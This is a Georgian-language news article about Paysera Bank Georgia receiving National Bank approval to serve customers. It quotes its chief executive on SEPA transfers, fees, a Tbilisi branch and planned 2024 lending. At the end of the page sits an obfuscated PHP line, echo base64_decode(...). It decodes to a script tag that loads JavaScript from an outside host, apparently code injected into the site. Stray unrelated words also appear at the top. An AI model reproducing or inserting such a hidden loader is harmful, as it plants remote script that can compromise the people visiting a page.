celsiusi
ავერსი შნაიდერი

საქართველოს ეროვნული ბანკის 2023 წლის 15 ივნისის განკარგულების თანახმად, სს „პეისერა ბანკი საქართველომ“ სატესტო რეჟიმი წარმატებით დაასრულა  და რეალურ რეჟიმში მომხმარებლის მომსახურების უფლება მიიღო.

სს „პეისერა ბანკი საქართველო“ არის პირველი ციფრული საბანკო ლიცენზიის მფლობელი ბანკი საქართველოში, რომლის ლიცენზია საქართველოს ეროვნულმა ბანკმა ციფრული ბანკის ლიცენზირების პრინციპებზე დაყრდნობით, 2022 წლის 17 ნოემბერს გასცა. ამ დრომდე ბანკი სატესტო რეჟიმში ოპერირებდა. ბანკი მომხმარებლებს სთავაზობს ევროპულ ფინტეკ პროდუქტებს და საქართველოს კომერციული ბანკის ლიცენზიით განსაზღვრულ სერვისებს.

BMG-ი ბანკის გენერალურ დირექტორს, დიმიტრი ქუმსიშვილს ესაუბრა. მისი განმარტებით, "პეისერა" მომხმარებლებზე კრედიტების გაცემას 2024 წლის იანვრიდან დაიწყებს.

„ჩვენ ძალიან მნიშვნელოვანი ეტაპები გავიარეთ დღემდე, მინდა მადლობა გადავუხადო პროცესის ყველა მონაწილეს: საქართველოს ეროვნული ბანკის გუნდს, რომელიც დაუღალავად გვემუშავა პროდუქტების და პროცესების ადაპტაციის ნაწილში, ასევე „პეისერას“ ქართველ და საერთაშორისო გუნდს.

საქართველოს ეროვნული ბანკის ინოვაციური ბიზნეს მოდელების ხელშეწყობის და ჩვენი კერძო ინიციატივის მეშვეობით, ქართველი მომხმარებელი SEPA-ს სისტემაში ერთვება, რაც იმას ნიშნავს, რომ დღეიდან ევროში ანგარიშსწორება ისეთივე მარტივია როგორც ლარში, ხოლო 100 000 ევრომდე ტრანზაქციები თუ მიმღების ბანკიც SEPA-შია ჩართული 24/7 განხორციელდება. ჩვენ მნიშვნელოვან როლს ვითამაშებთ ჩვენი ქვეყნის ევროპულ ოჯახთან დაახლოებაში.

როგორც ციფრული ბანკი ჩვენი მოსახურების ძირითადი არხები, რა თქმა უნდა, ჩვენი Paysera Supper App და ინტერნეტ ბანკი იქნება, თუმცა ჩვენ თბილისში ერთი ფილიალი აკაკი წერეთლის გამზირზე 2/4 -ში გვაქვს, სადაც ასევე მოვემსახურებით მომხმარებლებს, რომელთათვისაც ანგარიშების გახნას 26 ივნისიდან დავიწყებთ.

2023 წლის განმავლობაში ჩვენს მომხმარებელს ძალიან ბევრ საინტერესო საბანკო საოპერაციო პროდუქტს შევთავაზებთ, ხოლო 2024 წლიდან იგეგმება საკრედიტო პროდუქტების შეთავაზება. „პეისერა ბანკი საქართველო“ ქართველი მომხმარებლისთვის იქნება უსაზღვრო ევროპული შესაძლებლობების ადგილი.

რაც შეეხება მოსახურების ტარიფს, ერთს ახლავე გავაჟღერებ: გადარიცხვა EUR-ში ევროპაში მხოლოდ 7 ევრო ეღირება, როგორც ფიზიკური ისე იურიდიული პირებისთვის.

თამამად შემიძლია ვთქვა, რომ „პეისერა ბანკი საქართველომ“ ევროპის ფინანსურ სისტემასთან საქართველოს ნაწილის ინტეგრაცია შეძლო“, - განაცხადა დიმიტრი ქუმსიშვილმა.

ფინანსური ანგარიშის თანახმად, “პეისერას” აქტივები 6.8 მილიონ ლარს შეადგენს.

ბანკის ძირითადი პარტნიორები არიან დიმიტრი ქუმსიშვილი; ირაკლი ვეკუა; ივანე თევდორაშვილი; მინდია საბანაძე და ზაზა ბუაძე.

წყარო: BMG 

386
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");